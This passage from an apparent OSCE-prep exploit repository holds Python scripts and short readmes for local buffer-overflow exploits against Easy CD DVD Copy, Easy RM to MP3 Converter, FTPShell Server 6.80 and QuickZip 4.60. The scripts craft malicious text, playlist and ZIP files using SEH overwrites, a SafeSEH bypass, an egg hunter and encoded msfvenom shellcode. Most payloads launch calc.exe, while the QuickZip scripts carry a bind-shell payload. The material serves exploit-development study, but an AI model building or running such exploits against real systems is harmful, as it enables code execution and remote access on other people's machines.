shellcode += "\x8c\xf4\x67\x9b\x90\x0b\xab\x97\xac\x80\x4a\x78"
shellcode += "\x25\xd2\x68\x5c\x6e\x80\x11\xc5\xca\x67\x2d\x15"
shellcode += "\xb5\xd8\x8b\x5d\x5b\x0c\xa6\x3f\x31\xd3\x34\x3a"
shellcode += "\x77\xd3\x46\x45\x27\xbc\x77\xce\xa8\xbb\x87\x05"
shellcode += "\x8d\x34\xc2\x04\xa7\xdc\x8b\xdc\xfa\x80\x2b\x0b"
shellcode += "\x38\xbd\xaf\xbe\xc0\x3a\xaf\xca\xc5\x07\x77\x26"
shellcode += "\xb7\x18\x12\x48\x64\x18\x37\x2b\xeb\x8a\xdb\x82"
shellcode += "\x8e\x2a\x79\xdb"
buffer = "A" * 988 # Junk
buffer += "\xeb\x14\x90\x90" # + nSEH (Jump Code)
buffer += struct.pack('<L', 0x10037b11) # + SEH (pop ebx # pop eax # ret | [SkinMagic.dll])
buffer += "\x90" * 50 # + NOP
buffer += shellcode # + shellcode
buffer += "\x90" * 50 # + NOP
try:
f=open("OpenMe.txt","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
================================================
FILE: Local Buffer Overflow/EasyCDDVDCopyv1.3.24/readme.md
================================================
### Easy CD DVD Copy v1.3.24
Structured Exception Handler (SEH) chain overwrite exploit found during my prepperation for OSCE, see the link [EDB-ID: 44337](https://www.exploit-db.com/exploits/44337/)
================================================
FILE: Local Buffer Overflow/EasyRMtoMP3Converterv2.7.3.700/Exploit.py
================================================
#!/usr/share/python
import struct
import time
import socket
def BufferOverflow():
#------------------------------------------------------------------------------#
# msfvenom -p windows/exec CMD=calc.exe -b "\x00\x09\x0A" -f python -v payload #
#------------------------------------------------------------------------------#
shellcode = ""
shellcode += "\xdd\xc6\xd9\x74\x24\xf4\x5b\xbf\xd5\xc2\x64\xc2"
shellcode += "\x2b\xc9\xb1\x31\x83\xeb\xfc\x31\x7b\x14\x03\x7b"
shellcode += "\xc1\x20\x91\x3e\x01\x26\x5a\xbf\xd1\x47\xd2\x5a"
shellcode += "\xe0\x47\x80\x2f\x52\x78\xc2\x62\x5e\xf3\x86\x96"
shellcode += "\xd5\x71\x0f\x98\x5e\x3f\x69\x97\x5f\x6c\x49\xb6"
shellcode += "\xe3\x6f\x9e\x18\xda\xbf\xd3\x59\x1b\xdd\x1e\x0b"
shellcode += "\xf4\xa9\x8d\xbc\x71\xe7\x0d\x36\xc9\xe9\x15\xab"
shellcode += "\x99\x08\x37\x7a\x92\x52\x97\x7c\x77\xef\x9e\x66"
shellcode += "\x94\xca\x69\x1c\x6e\xa0\x6b\xf4\xbf\x49\xc7\x39"
shellcode += "\x70\xb8\x19\x7d\xb6\x23\x6c\x77\xc5\xde\x77\x4c"
shellcode += "\xb4\x04\xfd\x57\x1e\xce\xa5\xb3\x9f\x03\x33\x37"
shellcode += "\x93\xe8\x37\x1f\xb7\xef\x94\x2b\xc3\x64\x1b\xfc"
shellcode += "\x42\x3e\x38\xd8\x0f\xe4\x21\x79\xf5\x4b\x5d\x99"
shellcode += "\x56\x33\xfb\xd1\x7a\x20\x76\xb8\x10\xb7\x04\xc6"
shellcode += "\x56\xb7\x16\xc9\xc6\xd0\x27\x42\x89\xa7\xb7\x81"
shellcode += "\xee\x58\xf2\x88\x46\xf1\x5b\x59\xdb\x9c\x5b\xb7"
shellcode += "\x1f\x99\xdf\x32\xdf\x5e\xff\x36\xda\x1b\x47\xaa"
shellcode += "\x96\x34\x22\xcc\x05\x34\x67\xaf\xc8\xa6\xeb\x1e"
shellcode += "\x6f\x4f\x89\x5e"
#----------------------------#
# Payload #
#----------------------------#
# buffer = AAA padding # |---------------------------------------------------------+
# buffer = EIP overwrite # |--------| WinXP SP3 Pro : "\xFF\xE4" | [USER32.dll] |----|-+
# buffer = NOP sled # |---------------------------------------------------------|-|-+
# buffer = Shellcode # |---------------------------------------------------------|-|-|-+
# buffer = BBB padding # |---------------------------------------------------------|-|-|-|-+
#----------------------------# | | | | |
# | | | | |
buffer = "A" * 26065 # <-----------------------------------+ | | | |
buffer += struct.pack('<L', 0x7e47bcaf) # <-------------------------------------+ | | |
buffer += "\x90" * 40 # <---------------------------------------+ | |
buffer += shellcode # <-----------------------------------------+ |
buffer += "B" * (30000-26065-4-40-len(shellcode)) # <-------------------------------------------+
try:
f=open("OpenMe.m3u","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
time.sleep(1)
f.write(buffer)
f.close()
print "[+] File created. Load that shit up!"
except:
print "File cannot be created"
def main():
print (
'''
+-+-+-+-+ +-+-+ +-+-+ +-+-+-+ +-+-+-+-+-+-+-+-+-+ +-+-+-+-+-+-+-+-+-+-+
|E|a|s|y| |R|M| |t|o| |M|P|3| |C|o|n|v|e|r|t|e|r| |v|2|.|7|.|3|.|7|0|0|
+-+-+-+-+ +-+-+ +-+-+ +-+-+-+ +-+-+-+-+-+-+-+-+-+ +-+-+-+-+-+-+-+-+-+-+
+-+-+-+-+-+ +-+-+-+-+-+-+ +-+-+-+-+-+-+-+-+
|L|o|c|a|l| |B|u|f|f|e|r| |O|v|e|r|f|l|o|w|
+-+-+-+-+-+ +-+-+-+-+-+-+ +-+-+-+-+-+-+-+-+
'''
)
BufferOverflow()
if __name__ == '__main__':
main()
================================================
FILE: Local Buffer Overflow/EasyRMtoMP3Converterv2.7.3.700/readme.md
================================================
### Easy RM to MP3 Converter v2.7.3.700
Yet another vanilla save pointer overwirte (EIP) to pop calc.exe, nothing fancy.
================================================
FILE: Local Buffer Overflow/FTPShellServerv6.80/Exploit.py
================================================
#!/usr/bin/python
#----------------------------------------------------------------------------------------------------------#
# Exploit Title : FTPShell Server v6.80 - Local Buffer Overflow (SafeSEH Bypass) #
# Exploit Author : Hashim Jawad - @ihack4falafel #
# Vendor Homepage : http://www.ftpshell.com/ #
# Vulnerable Software: http://www.ftpshell.com/downloadserver.htm #
# Tested on : Windows XP Professional SP3 #
# Steps to reproduce : paste contents of Evil.txt in 'Password' field under configure accounts>Change pass #
#----------------------------------------------------------------------------------------------------------#
'''
Notes:
=====
* All loaded modules including base binary are compiled with /SAFESEH
* Null byte '\x00' get mangled by the program and end up as space '\x20'
'''
#root@kali:~# msfvenom -p windows/exec cmd=calc.exe -e x86/alpha_mixed -b "\x00\x0a\x0d" -f python -v shellcode
#Payload size: 447 bytes
shellcode = ""
shellcode += "\x89\xe0\xd9\xed\xd9\x70\xf4\x5a\x4a\x4a\x4a\x4a"
shellcode += "\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43"
shellcode += "\x43\x37\x52\x59\x6a\x41\x58\x50\x30\x41\x30\x41"
shellcode += "\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42"
shellcode += "\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x79"
shellcode += "\x6c\x7a\x48\x4c\x42\x67\x70\x73\x30\x57\x70\x43"
shellcode += "\x50\x4d\x59\x4b\x55\x36\x51\x59\x50\x61\x74\x4e"
shellcode += "\x6b\x56\x30\x46\x50\x6e\x6b\x61\x42\x56\x6c\x6c"
shellcode += "\x4b\x72\x72\x32\x34\x6e\x6b\x61\x62\x37\x58\x76"
shellcode += "\x6f\x38\x37\x72\x6a\x54\x66\x55\x61\x4b\x4f\x4e"
shellcode += "\x4c\x45\x6c\x30\x61\x71\x6c\x35\x52\x46\x4c\x45"
shellcode += "\x70\x6b\x71\x58\x4f\x44\x4d\x77\x71\x69\x57\x7a"
shellcode += "\x42\x6c\x32\x63\x62\x46\x37\x4e\x6b\x62\x72\x62"
shellcode += "\x30\x6e\x6b\x53\x7a\x47\x4c\x4c\x4b\x52\x6c\x74"
shellcode += "\x51\x52\x58\x6b\x53\x62\x68\x77\x71\x5a\x71\x62"
shellcode += "\x71\x4e\x6b\x76\x39\x57\x50\x36\x61\x4a\x73\x6e"
shellcode += "\x6b\x47\x39\x56\x78\x59\x73\x65\x6a\x52\x69\x6e"
shellcode += "\x6b\x57\x44\x6c\x4b\x67\x71\x4e\x36\x34\x71\x6b"
shellcode += "\x4f\x6e\x4c\x5a\x61\x58\x4f\x74\x4d\x76\x61\x4b"
shellcode += "\x77\x70\x38\x69\x70\x52\x55\x38\x76\x75\x53\x51"
shellcode += "\x6d\x59\x68\x65\x6b\x73\x4d\x65\x74\x43\x45\x78"
shellcode += "\x64\x61\x48\x6c\x4b\x36\x38\x67\x54\x76\x61\x49"
shellcode += "\x43\x73\x56\x4c\x4b\x76\x6c\x50\x4b\x6e\x6b\x31"
shellcode += "\x48\x77\x6c\x43\x31\x79\x43\x6e\x6b\x43\x34\x4c"
shellcode += "\x4b\x53\x31\x7a\x70\x4d\x59\x37\x34\x66\x44\x67"
shellcode += "\x54\x33\x6b\x53\x6b\x50\x61\x30\x59\x31\x4a\x63"
shellcode += "\x61\x69\x6f\x59\x70\x71\x4f\x51\x4f\x33\x6a\x6e"
shellcode += "\x6b\x76\x72\x6a\x4b\x6e\x6d\x33\x6d\x43\x5a\x63"
shellcode += "\x31\x6c\x4d\x6c\x45\x4c\x72\x47\x70\x45\x50\x33"
shellcode += "\x30\x56\x30\x53\x58\x74\x71\x4e\x6b\x62\x4f\x4f"
shellcode += "\x77\x59\x6f\x6b\x65\x6f\x4b\x4c\x30\x4f\x45\x6d"
shellcode += "\x72\x43\x66\x62\x48\x39\x36\x6a\x35\x6f\x4d\x4d"
shellcode += "\x4d\x59\x6f\x5a\x75\x47\x4c\x53\x36\x63\x4c\x55"
shellcode += "\x5a\x4f\x70\x49\x6b\x6d\x30\x31\x65\x53\x35\x6d"
shellcode += "\x6b\x62\x67\x37\x63\x30\x72\x62\x4f\x32\x4a\x55"
shellcode += "\x50\x70\x53\x79\x6f\x6e\x35\x31\x73\x71\x71\x30"
shellcode += "\x6c\x71\x73\x46\x4e\x43\x55\x51\x68\x35\x35\x35"
shellcode += "\x50\x41\x41"
buffer = '\xcc' * 2101 # filler to nSEH offset
buffer += '\xeb\x06\x90\x90' # nSEH | hop over SEH
buffer += '\x18\x05\xfc\x7f' # SEH | 0x7ffc0518 : pop edi # pop edi # ret [SafeSEH Bypass]
buffer += '\x90' * 10 # nops sled
buffer += shellcode # calc.exe
buffer += '\xcc' * (5000-2101-4-4-10-len(shellcode))
try:
f=open("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except Exception as e:
print e
================================================
FILE: Local Buffer Overflow/FTPShellServerv6.80/README.md
================================================
### FTPShell Server v6.80
Structured Exception Handler (SEH) overwrite exploit found during my prep to take on OSCE, had to look for an address outside the range of loaded modules (including base image) in order to bypass `safeSEH`. See the link [EDB-ID: 44713](https://www.exploit-db.com/exploits/44713/)
<p align="center">
<img src="https://github.com/ihack4falafel/OSCE/blob/master/Local%20Buffer%20Overflow/FTPShellServerv6.80/PoC.gif">
</p>
================================================
FILE: Local Buffer Overflow/QuickZipv4.60.019/Egg Hunter/Exploit.py
================================================
#!/usr/bin/python
#root@kali:~# msfvenom -p windows/shell_bind_tcp -b '\x00\x0a\x0d' -e x86/alpha_mixed BufferRegister=EDI -f python -v shellcode
#Payload size: 710 bytes
shellcode = "T00WT00W"
shellcode += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58"
shellcode += "\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42"
shellcode += "\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
shellcode += "\x42\x75\x4a\x49\x59\x6c\x58\x68\x4c\x42\x53\x30"
shellcode += "\x35\x50\x65\x50\x55\x30\x6d\x59\x38\x65\x56\x51"
shellcode += "\x79\x50\x73\x54\x6c\x4b\x46\x30\x36\x50\x6c\x4b"
shellcode += "\x56\x32\x44\x4c\x6e\x6b\x70\x52\x44\x54\x4c\x4b"
shellcode += "\x44\x32\x44\x68\x66\x6f\x68\x37\x33\x7a\x47\x56"
shellcode += "\x74\x71\x4b\x4f\x4c\x6c\x55\x6c\x53\x51\x51\x6c"
shellcode += "\x76\x62\x44\x6c\x67\x50\x4b\x71\x68\x4f\x44\x4d"
shellcode += "\x67\x71\x4f\x37\x59\x72\x7a\x52\x62\x72\x76\x37"
shellcode += "\x4e\x6b\x52\x72\x74\x50\x6e\x6b\x62\x6a\x57\x4c"
shellcode += "\x6c\x4b\x50\x4c\x77\x61\x30\x78\x38\x63\x67\x38"
shellcode += "\x76\x61\x5a\x71\x52\x71\x6c\x4b\x51\x49\x77\x50"
shellcode += "\x45\x51\x49\x43\x6e\x6b\x71\x59\x76\x78\x4d\x33"
shellcode += "\x37\x4a\x37\x39\x6c\x4b\x55\x64\x6e\x6b\x36\x61"
shellcode += "\x4b\x66\x34\x71\x49\x6f\x6e\x4c\x4b\x71\x78\x4f"
shellcode += "\x44\x4d\x73\x31\x48\x47\x64\x78\x6b\x50\x74\x35"
shellcode += "\x68\x76\x54\x43\x71\x6d\x69\x68\x45\x6b\x63\x4d"
shellcode += "\x54\x64\x52\x55\x4d\x34\x76\x38\x6e\x6b\x32\x78"
shellcode += "\x56\x44\x67\x71\x48\x53\x52\x46\x4e\x6b\x76\x6c"
shellcode += "\x30\x4b\x6c\x4b\x62\x78\x67\x6c\x47\x71\x6b\x63"
shellcode += "\x6e\x6b\x77\x74\x4c\x4b\x66\x61\x6a\x70\x4b\x39"
shellcode += "\x53\x74\x76\x44\x56\x44\x63\x6b\x51\x4b\x35\x31"
shellcode += "\x76\x39\x62\x7a\x33\x61\x39\x6f\x49\x70\x43\x6f"
shellcode += "\x61\x4f\x62\x7a\x6c\x4b\x62\x32\x7a\x4b\x4c\x4d"
shellcode += "\x43\x6d\x70\x68\x76\x53\x37\x42\x45\x50\x45\x50"
shellcode += "\x63\x58\x74\x37\x72\x53\x46\x52\x61\x4f\x66\x34"
shellcode += "\x30\x68\x70\x4c\x71\x67\x74\x66\x36\x67\x6b\x4f"
shellcode += "\x38\x55\x4f\x48\x6c\x50\x33\x31\x75\x50\x67\x70"
shellcode += "\x34\x69\x4b\x74\x31\x44\x62\x70\x42\x48\x54\x69"
shellcode += "\x4b\x30\x62\x4b\x63\x30\x39\x6f\x78\x55\x33\x5a"
shellcode += "\x46\x68\x46\x39\x66\x30\x38\x62\x4b\x4d\x61\x50"
shellcode += "\x30\x50\x47\x30\x46\x30\x65\x38\x68\x6a\x54\x4f"
shellcode += "\x69\x4f\x6b\x50\x59\x6f\x6b\x65\x6f\x67\x55\x38"
shellcode += "\x44\x42\x65\x50\x66\x71\x63\x6c\x4b\x39\x4a\x46"
shellcode += "\x33\x5a\x42\x30\x32\x76\x43\x67\x55\x38\x6a\x62"
shellcode += "\x69\x4b\x56\x57\x33\x57\x49\x6f\x78\x55\x73\x67"
shellcode += "\x31\x78\x6e\x57\x58\x69\x57\x48\x39\x6f\x79\x6f"
shellcode += "\x69\x45\x43\x67\x70\x68\x54\x34\x7a\x4c\x45\x6b"
shellcode += "\x78\x61\x69\x6f\x4b\x65\x63\x67\x6a\x37\x65\x38"
shellcode += "\x42\x55\x52\x4e\x72\x6d\x30\x61\x79\x6f\x6b\x65"
shellcode += "\x35\x38\x52\x43\x30\x6d\x71\x74\x67\x70\x4b\x39"
shellcode += "\x6b\x53\x31\x47\x62\x77\x31\x47\x76\x51\x49\x66"
shellcode += "\x33\x5a\x57\x62\x31\x49\x73\x66\x6d\x32\x6b\x4d"
shellcode += "\x53\x56\x69\x57\x73\x74\x67\x54\x55\x6c\x35\x51"
shellcode += "\x45\x51\x6c\x4d\x73\x74\x51\x34\x52\x30\x5a\x66"
shellcode += "\x45\x50\x42\x64\x71\x44\x42\x70\x32\x76\x53\x66"
shellcode += "\x50\x56\x47\x36\x36\x36\x50\x4e\x52\x76\x32\x76"
shellcode += "\x50\x53\x73\x66\x62\x48\x43\x49\x4a\x6c\x37\x4f"
shellcode += "\x6c\x46\x79\x6f\x4b\x65\x4c\x49\x59\x70\x30\x4e"
shellcode += "\x42\x76\x32\x66\x39\x6f\x50\x30\x51\x78\x74\x48"
shellcode += "\x6f\x77\x45\x4d\x35\x30\x49\x6f\x4e\x35\x6d\x6b"
shellcode += "\x6c\x30\x58\x35\x4e\x42\x46\x36\x73\x58\x6f\x56"
shellcode += "\x6f\x65\x6f\x4d\x4f\x6d\x69\x6f\x7a\x75\x65\x6c"
shellcode += "\x37\x76\x71\x6c\x45\x5a\x6d\x50\x79\x6b\x4b\x50"
shellcode += "\x33\x45\x46\x65\x6d\x6b\x57\x37\x56\x73\x64\x32"
shellcode += "\x52\x4f\x63\x5a\x47\x70\x51\x43\x49\x6f\x4a\x75"
shellcode += "\x41\x41"
####################### ZIP File Structure ########################
###################################################################
######################## Local File Header ########################
LocalFileHeader = '\x50\x4b\x03\x04' # local file header signature
LocalFileHeader += '\x14\x00' # version needed to extract 0x14 = 20 -> 2.0
LocalFileHeader += '\x00\x00' # general purpose bit flag
LocalFileHeader += '\x00\x00' # compression method
LocalFileHeader += '\xb7\xac' # file last modification time 0xacb7 -> H=21 M=37 S=23 -> 21:37:23
LocalFileHeader += '\xce\x34' # file last modification date 0x34ce -> D=3 M=6 Y=2006 -> 2006/6/3
LocalFileHeader += '\x00\x00\x00' # CRC-32 '\x00' was left out to make sure we hit 25 bytes before file length
LocalFileHeader += '\x00\x00\x00\x00' # compressed size
LocalFileHeader += '\x00\x00\x00\x00' # uncompressed size
LocalFileHeader += '\xe4\x0f' # file name length 0x0fe4 = 4068 bytes
LocalFileHeader += '\x00\x00' # extra field length
LocalFileHeader += '\x00' # file name
#LocalFileHeader += '\x00' # extra filed
################## Central Directory File Header ##################
CDFileHeader = '\x50\x4b\x01\x02' # cd file header signature
CDFileHeader += '\x14\x00' # version made by 0x14 = 20 -> 2.0
CDFileHeader += '\x14\x00' # version needed to extract 0x14 = 20 -> 2.0
CDFileHeader += '\x00\x00' # general purpose bit flag
CDFileHeader += '\x00\x00' # compression method
CDFileHeader += '\xb7\xac' # file last modification time 0xacb7 -> H=21 M=37 S=23 -> 21:37:23
CDFileHeader += '\xce\x34' # file last modification date 0x34ce -> D=3 M=6 Y=2006 -> 2006/6/3
CDFileHeader += '\x00\x00\x00\x00' # CRC-32
CDFileHeader += '\x00\x00\x00\x00' # compressed size
CDFileHeader += '\x00\x00\x00\x00' # uncompressed size
CDFileHeader += '\xe4\x0f' # file name length 0x0fe4 = 4068 bytes
CDFileHeader += '\x00\x00' # extra field length
CDFileHeader += '\x00\x00' # file comment length
CDFileHeader += '\x00\x00' # disk number where file starts
CDFileHeader += '\x01\x00' # internal file attributes BIT 0: apparent ASCII/text file
CDFileHeader += '\x24\x00\x00\x00' # external file attributes
CDFileHeader += '\x00\x00\x00\x00' # relative offset of local file header
#CDFileHeader += '\x00' # file name
#CDFileHeader += '\x00' # extra field
#CDFileHeader += '\x00' # file comment
################ End of Central Directory Record ##################
EOCDRHeader = '\x50\x4b\x05\x06' # End of central directory signature
EOCDRHeader += '\x00\x00' # number of this disk
EOCDRHeader += '\x00\x00' # disk where central directory starts
EOCDRHeader += '\x01\x00' # number of central directory records on this disk
EOCDRHeader += '\x01\x00' # total number of central directory records
EOCDRHeader += '\x12\x10\x00\x00' # size of central directory (4114 bytes)
EOCDRHeader += '\x02\x10\x00\x00' # offset of start of central directory, relative to start of archive
EOCDRHeader += '\x00\x00' # comment length
#EOCDRHeader += '\x00' # comment
#root@kali:~# msfvenom -a x86 --platform windows -e x86/alpha_mixed BufferRegister=EAX -b '\x00' < /opt/OSCE/Tools/EggHunter.bin
#Payload size: 118 bytes
EggHunter = 'PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJISVoqkzYovoPBCbbJDBqHzm6NuldECj3DhoLxBtdpfPaGNkijLoT5kZlobUywkOxgAA'
Evil = '\x41' * 10 # filler to egghunter
Evil += EggHunter # hunt baby hunt!
Evil += '\x42' * 47 # filler to the start of hand crafted shellcode
Evil += '\x54' # PUSH ESP * save stack pointer
Evil += '\x5F' # POP EDI * point eax to where we want to decode otherwise bad shellcode
Evil += '\x54' # push esp
Evil += '\x58' # pop eax
Evil += '\x05\x21\x13\x11\x11' # add eax,0x11111321
Evil += '\x05\x21\x16\x11\x11' # add eax,0x11111621
Evil += '\x2d\x06\x23\x22\x22' # sub eax,0x22222306
Evil += '\x50' # PUSH EAX
Evil += '\x5C' # POP ESP * move eax value into stack pointer
Evil += '\x25\x4A\x4D\x4E\x55' # AND EAX,554E4D4A * decode 'mov esp, edi;jmp eax'
Evil += '\x25\x35\x32\x31\x2A' # AND EAX,2A313235
Evil += '\x05\x44\x76\x77\x61' # ADD EAX,61777644
Evil += '\x05\x44\x65\x66\x51' # ADD EAX,51666544
Evil += '\x05\x34\x54\x55\x61' # ADD EAX,61555434
Evil += '\x2D\x33\x33\x33\x33' # SUB EAX,33333333
Evil += '\x50' # PUSH EAX
Evil += '\x25\x4A\x4D\x4E\x55' # AND EAX,554E4D4A * point eax to egg hunter shellcode
Evil += '\x25\x35\x32\x31\x2A' # AND EAX,2A313235
Evil += '\x05\x71\x75\x11\x11' # ADD EAX,11117571
Evil += '\x05\x71\x75\x11\x11' # ADD EAX,11117571
Evil += '\x05\x11\x35\x11\x11' # ADD EAX,11113511
Evil += '\x2D\x13\x25\x21\x33' # SUB EAX,33212513
Evil += '\x41' * (294-10-len(EggHunter)-47-82)
Evil += '\x75\x9f\x74\x9f' # nSEH JZ & JNZ (aka jump net)
Evil += '\x41\x16\x40\x00' # SEH pop esi,pop ebx, retn in QuickZip.exe
Evil += shellcode # egg + shellcode
Evil += '\x41' * (4064-294-4-4-len(shellcode))
Evil += '.txt'
buffer = LocalFileHeader
buffer += Evil
buffer += CDFileHeader
buffer += Evil
buffer += EOCDRHeader
try:
f=open("Evil.zip","w")
print "[+] Creating %s bytes evil payload.." %len(Evil)
f.write(buffer)
f.close()
print "[+] File created!"
except Exception as e:
print e
================================================
FILE: Local Buffer Overflow/QuickZipv4.60.019/OS Dependent/Exploit.py
================================================
#!/usr/bin/python
# root@kali:~# msfvenom -p windows/shell_bind_tcp -b '\x00\x0a\x0d' -e x86/alpha_mixed BufferRegister=EAX -f python -v shellcode
# Payload size: 710 bytes
shellcode = ""
shellcode += "\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58"
shellcode += "\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42"
shellcode += "\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
shellcode += "\x42\x75\x4a\x49\x69\x6c\x69\x78\x4c\x42\x73\x30"
shellcode += "\x37\x70\x57\x70\x55\x30\x6f\x79\x49\x75\x74\x71"
shellcode += "\x39\x50\x72\x44\x4e\x6b\x76\x30\x64\x70\x6e\x6b"
shellcode += "\x62\x72\x36\x6c\x4e\x6b\x76\x32\x34\x54\x6e\x6b"
shellcode += "\x44\x32\x74\x68\x66\x6f\x68\x37\x32\x6a\x37\x56"
shellcode += "\x35\x61\x6b\x4f\x4e\x4c\x65\x6c\x45\x31\x31\x6c"
shellcode += "\x43\x32\x64\x6c\x75\x70\x79\x51\x4a\x6f\x66\x6d"
shellcode += "\x76\x61\x6b\x77\x4d\x32\x7a\x52\x43\x62\x73\x67"
shellcode += "\x6e\x6b\x61\x42\x34\x50\x6e\x6b\x42\x6a\x75\x6c"
shellcode += "\x4c\x4b\x42\x6c\x57\x61\x63\x48\x6a\x43\x57\x38"
shellcode += "\x73\x31\x58\x51\x73\x61\x4c\x4b\x66\x39\x47\x50"
shellcode += "\x75\x51\x4e\x33\x6e\x6b\x37\x39\x32\x38\x49\x73"
shellcode += "\x74\x7a\x67\x39\x4e\x6b\x50\x34\x4e\x6b\x35\x51"
shellcode += "\x6e\x36\x56\x51\x39\x6f\x6c\x6c\x79\x51\x38\x4f"
shellcode += "\x74\x4d\x57\x71\x39\x57\x56\x58\x79\x70\x31\x65"
shellcode += "\x49\x66\x44\x43\x61\x6d\x4c\x38\x45\x6b\x63\x4d"
shellcode += "\x45\x74\x72\x55\x7a\x44\x62\x78\x6e\x6b\x76\x38"
shellcode += "\x47\x54\x76\x61\x59\x43\x70\x66\x4e\x6b\x36\x6c"
shellcode += "\x70\x4b\x4e\x6b\x71\x48\x75\x4c\x76\x61\x4e\x33"
shellcode += "\x6c\x4b\x56\x64\x6e\x6b\x46\x61\x7a\x70\x6b\x39"
shellcode += "\x71\x54\x45\x74\x57\x54\x43\x6b\x33\x6b\x75\x31"
shellcode += "\x30\x59\x61\x4a\x30\x51\x79\x6f\x39\x70\x63\x6f"
shellcode += "\x43\x6f\x30\x5a\x6c\x4b\x52\x32\x48\x6b\x6c\x4d"
shellcode += "\x43\x6d\x30\x68\x67\x43\x47\x42\x35\x50\x77\x70"
shellcode += "\x53\x58\x34\x37\x32\x53\x64\x72\x43\x6f\x46\x34"
shellcode += "\x31\x78\x72\x6c\x44\x37\x65\x76\x63\x37\x69\x6f"
shellcode += "\x6e\x35\x4c\x78\x6e\x70\x53\x31\x57\x70\x65\x50"
shellcode += "\x47\x59\x6a\x64\x71\x44\x42\x70\x70\x68\x44\x69"
shellcode += "\x6b\x30\x42\x4b\x67\x70\x4b\x4f\x38\x55\x33\x5a"
shellcode += "\x57\x78\x62\x79\x32\x70\x38\x62\x4b\x4d\x47\x30"
shellcode += "\x36\x30\x73\x70\x50\x50\x62\x48\x7a\x4a\x74\x4f"
shellcode += "\x6b\x6f\x39\x70\x69\x6f\x78\x55\x6a\x37\x32\x48"
shellcode += "\x66\x62\x73\x30\x34\x51\x51\x4c\x4c\x49\x5a\x46"
shellcode += "\x31\x7a\x42\x30\x31\x46\x66\x37\x55\x38\x68\x42"
shellcode += "\x39\x4b\x44\x77\x51\x77\x49\x6f\x4a\x75\x32\x77"
shellcode += "\x51\x78\x38\x37\x6a\x49\x75\x68\x69\x6f\x49\x6f"
shellcode += "\x6a\x75\x70\x57\x71\x78\x43\x44\x68\x6c\x67\x4b"
shellcode += "\x49\x71\x69\x6f\x69\x45\x51\x47\x6c\x57\x31\x78"
shellcode += "\x54\x35\x42\x4e\x72\x6d\x71\x71\x59\x6f\x39\x45"
shellcode += "\x45\x38\x33\x53\x72\x4d\x53\x54\x55\x50\x4c\x49"
shellcode += "\x6b\x53\x42\x77\x51\x47\x76\x37\x70\x31\x79\x66"
shellcode += "\x53\x5a\x32\x32\x73\x69\x66\x36\x49\x72\x39\x6d"
shellcode += "\x70\x66\x48\x47\x51\x54\x47\x54\x35\x6c\x35\x51"
shellcode += "\x56\x61\x6c\x4d\x47\x34\x34\x64\x32\x30\x7a\x66"
shellcode += "\x35\x50\x43\x74\x73\x64\x46\x30\x70\x56\x50\x56"
shellcode += "\x32\x76\x43\x76\x33\x66\x50\x4e\x62\x76\x43\x66"
shellcode += "\x73\x63\x32\x76\x70\x68\x62\x59\x58\x4c\x47\x4f"
shellcode += "\x6b\x36\x39\x6f\x4a\x75\x6c\x49\x69\x70\x72\x6e"
shellcode += "\x52\x76\x33\x76\x39\x6f\x76\x50\x52\x48\x46\x68"
shellcode += "\x6e\x67\x47\x6d\x33\x50\x79\x6f\x79\x45\x6f\x4b"
shellcode += "\x78\x70\x6e\x55\x79\x32\x56\x36\x73\x58\x6e\x46"
shellcode += "\x6a\x35\x4f\x4d\x4d\x4d\x59\x6f\x39\x45\x65\x6c"
shellcode += "\x77\x76\x61\x6c\x47\x7a\x4f\x70\x79\x6b\x69\x70"
shellcode += "\x62\x55\x54\x45\x6f\x4b\x51\x57\x56\x73\x64\x32"
shellcode += "\x62\x4f\x52\x4a\x37\x70\x43\x63\x4b\x4f\x49\x45"
shellcode += "\x41\x41"
####################### ZIP File Structure ########################
###################################################################
######################## Local File Header ########################
LocalFileHeader = '\x50\x4b\x03\x04' # local file header signature
LocalFileHeader += '\x14\x00' # version needed to extract 0x14 = 20 -> 2.0
LocalFileHeader += '\x00\x00' # general purpose bit flag
LocalFileHeader += '\x00\x00' # compression method
LocalFileHeader += '\xb7\xac' # file last modification time 0xacb7 -> H=21 M=37 S=23 -> 21:37:23
LocalFileHeader += '\xce\x34' # file last modification date 0x34ce -> D=3 M=6 Y=2006 -> 2006/6/3
LocalFileHeader += '\x00\x00\x00' # CRC-32 '\x00' was left out to make sure we hit 25 bytes before file length
LocalFileHeader += '\x00\x00\x00\x00' # compressed size
LocalFileHeader += '\x00\x00\x00\x00' # uncompressed size
LocalFileHeader += '\xe4\x0f' # file name length 0x0fe4 = 4068 bytes
LocalFileHeader += '\x00\x00' # extra field length
LocalFileHeader += '\x00' # file name
#LocalFileHeader += '\x00' # extra filed
################## Central Directory File Header ##################
CDFileHeader = '\x50\x4b\x01\x02' # cd file header signature
CDFileHeader += '\x14\x00' # version made by 0x14 = 20 -> 2.0
CDFileHeader += '\x14\x00' # version needed to extract 0x14 = 20 -> 2.0
CDFileHeader += '\x00\x00' # general purpose bit flag
CDFileHeader += '\x00\x00' # compression method
CDFileHeader += '\xb7\xac' # file last modification time 0xacb7 -> H=21 M=37 S=23 -> 21:37:23
CDFileHeader += '\xce\x34' # file last modification date 0x34ce -> D=3 M=6 Y=2006 -> 2006/6/3
CDFileHeader += '\x00\x00\x00\x00' # CRC-32
CDFileHeader += '\x00\x00\x00\x00' # compressed size
CDFileHeader += '\x00\x00\x00\x00' # uncompressed size
CDFileHeader += '\xe4\x0f' # file name length 0x0fe4 = 4068 bytes
CDFileHeader += '\x00\x00' # extra field length
CDFileHeader += '\x00\x00' # file comment length
